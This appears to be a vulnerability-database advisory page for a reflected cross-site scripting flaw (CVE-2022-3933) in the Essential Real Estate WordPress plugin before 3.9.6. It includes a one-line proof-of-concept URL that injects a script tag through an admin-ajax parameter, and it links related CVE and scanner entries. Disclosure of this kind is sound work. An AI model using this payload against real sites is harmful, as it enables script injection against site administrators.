Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbCydaveWPVDB-ID:6395F3F1-5CDF-4C55-920C-ACCC0201BAF4
HistoryNov 17, 2022 - 12:00 a.m.

Essential Real Estate < 3.9.6 - Reflected Cross-Site-Scripting

2022-11-1700:00:00
cydave
wpscan.com
6
essential real estate
cross-site scripting
admin
vulnerable software

EPSS

0.001

Percentile

30.4%

JSON

The plugin does not sanitize and escapes some parameters, which could allow users with a role as low as Admin to perform Cross-Site Scripting attacks.

PoC

https://example.com/wp-admin/admin-ajax.php?action=ere_property_gallery_fillter_ajax&amp;columns;_gap="><script>alert("xss");</script><!--

Related

wpexploit 1
cvelist 1
nvd 1
prion 1
nuclei 1
cve 1
wpexploit
wpexploit
Essential Real Estate < 3.9.6 - Reflected Cross-Site-Scripting
2022-11-17 00:00:00
cvelist
cvelist
CVE-2022-3933 Essential Real Estate < 3.9.6 - Reflected Cross-Site-Scripting
2022-12-12 17:54:37
nvd
nvd
CVE-2022-3933
2022-12-12 18:15:12
prion
prion
Cross site scripting
2022-12-12 18:15:00
nuclei
nuclei
WordPress Essential Real Estate <3.9.6 - Authenticated Cross-Site Scripting
2023-03-18 22:07:09
cve
cve
CVE-2022-3933
2022-12-12 18:15:12

EPSS

0.001

Percentile

30.4%

JSON
Related for WPVDB-ID:6395F3F1-5CDF-4C55-920C-ACCC0201BAF4
wpexploit1cvelist1nvd1prion1nuclei1cve1